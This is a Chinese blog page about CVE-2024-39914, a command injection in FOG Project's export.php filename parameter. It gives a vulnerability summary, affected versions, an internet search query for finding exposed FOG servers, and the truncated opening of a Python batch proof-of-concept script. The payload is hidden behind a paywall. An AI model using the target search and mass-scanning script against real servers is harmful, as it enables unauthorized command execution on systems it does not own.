FOG Project 文件名命令注入漏洞批量POC脚本(CVE-2024-39914)

最新推荐文章于 2025-04-27 19:16:18 发布
最新推荐文章于 2025-04-27 19:16:18 发布
阅读量483 收藏 1
点赞数 5
文章标签: 安全 web安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/mai_ge_/article/details/140577174
版权

漏洞描述

FOG是一款克隆/成像/救援套件/库存管理系统。在版本低于1.5.10.34的情况下,FOG中的packages/web/lib/fog/reportmaker.class.php文件受到命令注入漏洞的影响,该漏洞存在于/fog/management/export.php的文件名filename参数中。

漏洞影响

FOGPROJECT < 1.5.10.34 版本

搜索语句

鹰图平台:web.body="FOG Project" 

批量脚本

import requests
import threading


class fog_poc:
    def __init__(self, file_path):
        file_path = file_path.replace('\"', '')
        file_path = file_path.replace('\'', '')
        with open(file_path, 'r') as f:
            self.url_list = f.readlines()

    def poc(self):
        #构造poc
        url_path = '/fog/management/export.php?filen
最低0.47元/天 解锁文章
Ma1g3
关注
FOG Project 文件名命令注入漏洞复现(CVE-2024-39914
0xSec
07-18 1583
漏洞FOGPROJECT中的packages/web/lib/fog/reportmaker.class.php文件受到命令注入漏洞的影响,该漏洞存在于/fog/management/export.php的filename参数,未经身份验证的远程攻击者可利用此漏洞执行任意命令,获取服务器权限。
fogproject系统接口export.php存在远程命令执行漏洞(CVE-2024-39914)
B1ackW4ter的博客
10-19 120
FOG是一款克隆/成像/救援套件/库存管理系统。在版本低于1.5.10.34的情况下,FOG中的packages/web/lib/fog/reportmaker.class.php文件受到命令注入漏洞的影响,该漏洞存在于/fog/management/export.php文件名参数中。此漏洞已在版本1.5.10.34中得到修复。
FOG远程命令执行CVE-2024-39914漏洞分析
道一安全
08-15 1024
今天来分析一下FOG远程命令执行CVE-2024-39914漏洞,这个漏洞是七月份爆出来了,目前最新版已经修复,如果需要复现可以下载1.5.10.34之前的版本,我用的是1.5.10版本分析。
Fog Project 安装与应用
shanxun1012的专栏
04-04 2111
XX。
推荐开源项目:FOGProject —— 免费的克隆与镜像管理系统
gitblog_00005的博客
05-15 1251
推荐开源项目:FOGProject —— 免费的克隆与镜像管理系统 项目地址:https://gitcode.com/gh_mirrors/fo/fogproject 项目介绍 在IT管理中,快速高效地部署和维护大量设备是关键。FOGProject 是一个免费且开放源码的克隆、映像恢复、救援套件和资产管理系统,专为简化这个过程而设计。它利用PXE(预启动执行环境)、PartClone工具以及一个直...
网络安全漏洞现状与风险管理分析
weixin_43172311的博客
04-27 519
在当今数字化时代,网络安全已成为企业和组织不可忽视的核心问题。网络环境的日益复杂和攻击手段的不断升级,使得漏洞管理成为网络安全战略中的关键环节。下面将详细分析当前网络安全领域的漏洞现状及有效的风险管理策略。
WT2000T专业录音芯片:破解普通录音设备信息留存、合规安全远程协作三大难题
Waytronic_的博客
04-23 1005
在快节奏的现代商业环境中,会议是企业决策、创意碰撞和战略部署的核心场景。然而,传统会议记录方式常面临效率低、信息遗漏、回溯困难等痛点。如何确保会议内容被精准记录并高效利用?会议室专用录音芯片应运而生,以智能化、高保真、安全便捷的特性,成为企业高效办公的“隐形助手”。
实战!银河麒麟 KYSEC 安全中心执行控制高级配置指南
鹏大圣运维
04-25 1051
在信创环境下,为了提升系统安全性,银河麒麟内置了 KYSEC 安全标签系统,通过执行控制(exectl)机制,我们可以对脚本、应用程序进行可信授权、白名单控制,防止恶意程序运行。银河麒麟操作系统的 KYSEC 安全中心提供了强大的执行控制能力,既支持图形化设置,也支持命令批量管理,是信创场景下提升操作系统主动防护能力的重要工具。在默认配置下,当你执行一个普通脚本(例如 test.sh)时,系统会弹出安全中心的授权对话框,要求确认“是否允许执行”。就需要通过高级配置来提前授信,设置执行控制标签。
Inxpect 新推高性价比版毫米波安全雷达:以经济实用护航工业安全
欣佰特cnbestec的博客
04-23 603
在工业安全与自动化领域,Inxpect 品牌凭借深厚技术积累和创新能力,逐渐占据重要地位。其毫米波安全雷达系统凭借出色性能和高可靠性,为工业环境中的人员与设备安全筑牢防线。Inxpect 品牌的成长历程见证了其在工业安全领域的持续深耕。从早期技术研发到如今全球市场拓展,Inxpect 始终专注创新。2020 年,Inxpect 抓住数字化转型机遇,成功适应工业 4.0 需求。通过优化产品性能和提升用户体验,品牌在工业安全领域赢得良好声誉。宝马集团慕尼黑工厂焊接线的应用,体现了其产品在工业自动化领域的实力。
漏洞管理体系:从扫描评估到修复验证的全生命周期实践
迷路的小绅士之家
04-25 553
计划:制定年度漏洞管理计划,明确扫描频率(如核心系统每周扫描,边缘系统每月扫描);执行:通过自动化工具实施扫描、评估、修复,减少人工干预误差;检查:通过复测验证修复效果,分析漏报/误报原因(如扫描插件版本过旧);处理:更新扫描策略、优化修复流程,形成管理闭环。在漏洞数量爆发式增长的今天,企业需从“漏洞发现能力”转向“漏洞响应能力”,通过资产精准测绘、风险量化评估、自动化修复,将漏洞管理从“成本中心”转化为“安全护城河”。
了解低功耗蓝牙中的安全密钥
技术超强的网络安全平台
04-24 1383
如果生成的签名与附加到数据的签名匹配,则确认数据的完整性和真实性。这就像一封信被一个独特的蜡封封住一样——当设备接收到数据时,它会检查蜡封,如果匹配,它就知道数据是真实的,没有被篡改过。在深入研究低功耗蓝牙 (LE) 技术如何使用安全密钥(图 1)的具体细节之前,让我们先回顾一下,通过了解安全密钥是什么来奠定基础,特别是对于那些刚刚进入有趣的密码学世界的人来说。因此,解析结果成功。身份地址是一个唯一的、恒定的地址,可以是公开的(在制造过程中分配),也可以是静态的(随机选择,但在设备重启后保持不变)。
银行卡归属地查询的快速入门:API接口性能与安全兼备的高效实现
APIsmileJ的博客
04-25 941
万维易源的“银行卡归属信息查询”API为开发者和企业提供了一个高效、便捷的工具,可以通过简单的接口调用获取银行卡的详细信息。通过该API,可以快速查询银行卡的归属地、银行名称、电话号码、网址、卡种、银联Luhn效验和BIN码等信息,适用于金融分析、支付系统、风险管理等多种场景。
腾讯云服务器安全——服务防火墙端口放行
cybersnow精通 28 门计算机语言,凭借其超凡的技术能力,成功开发过上万个应用,广泛涉及政府、商业、个人等众多领域,甚至在检察院、环保局、公安局等专业场景中也大放异彩。不仅熟练掌握单片机和物联网开发,在软件架构设计方面更是独树一帜,自创了跨平台软件
04-24 284
点击服务进入安全策略。
AI赋能守护行车安全新防线,基于YOLOv5全系列【n/s/m/l/x】参数模型开发构建驾驶车辆场景下驾驶员疲劳分心驾驶行为智能检测预警系统
Together_CZ的博客
04-27 710
AI赋能守护行车安全新防线,基于YOLOv5全系列【n/s/m/l/x】参数模型开发构建驾驶车辆场景下驾驶员疲劳分心驾驶行为智能检测预警系统
Kaamel白皮书:IoT设备安全隐私评估实践
最新发布
kaamelai的博客
04-27 597
明确评估的目的和预期结果。
Java24 抗量子加密:后量子时代的安全基石
qq_20294455的博客
04-26 946
Java 24 的抗量子加密功能标志着企业级开发进入后量子时代。通过标准化的 ML-KEM 和 ML-DSA,Java 不仅为现有系统提供安全防护,更为未来十年的技术演进预留空间。开发者应尽快学习新 API,在关键业务系统中部署抗量子加密,同时关注 NIST 标准动态,确保系统的长期安全性。随着量子计算的临近,Java 24 将成为企业应对安全挑战的重要武器。
[论文梳理] 足式机器人规划&控制流程 - 接触&碰撞的控制 - 模型误差 - 自动驾驶车的安全&合规(4个课堂讨论问题)
科研汪小陈的主页:https://chensuzeyu.github.io
04-27 671
​机器人学 课堂讨论 (seminar) 记录; 问题驱动的学习,有助于进一步提出有价值的问题; 梳理机器人运动规划和控制领域的主流问题和技术; 以问题为框架,梳理论文更高效 ​
泰迪杯实战案例超深度解析:运输车辆安全驾驶行为分析与安全评价系统设计
qq_63961628的博客
04-27 509
在道路运输行业,不良驾驶行为(如急加速、急减速、疲劳驾驶)是引发交通事故的主要诱因,占事故总量的70%以上。,推荐结合《Python数据挖掘:入门、进阶与实用案例分析》第11章“交通大数据应用”进行扩展学习。练习GeoPandas空间计算:计算轨迹曲率、急转弯检测。:GPS漂移点干扰路线分析,急变速行为需精准识别。构建驾驶行为知识图谱:Neo4j存储规则与历史事件。:需综合安全、效率、能耗构建多目标评价体系。:融合路侧单元(RSU)数据提升检测精度。:平衡安全、效率、能耗的帕累托前沿分析。
数据治理体系的“三驾马车”:质量、安全与价值挖掘
大刘讲IT
04-23 633
数据治理已从合规驱动的后台职能,演变为驱动业务成果的战略核心。本文将深入探讨现代数据治理体系的三大核心驱动力——数据质量、数据安全与价值挖掘——它们共同构成了企业在数字时代取得成功的基石。数据质量是信任的基石,确保决策所依据的信息准确可靠;数据安全是资产和隐私的保护盾,在日益复杂的威胁和监管环境中保障数据资产;而价值挖掘则是洞察力和增长的引擎,通过商业智能(BI)和分析将数据转化为战略优势。这三大支柱紧密关联、相互依存。高质量数据是有效安全监控和可靠价值挖掘的前提;强大的安全保障则为数据的合规使用和价值实现
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值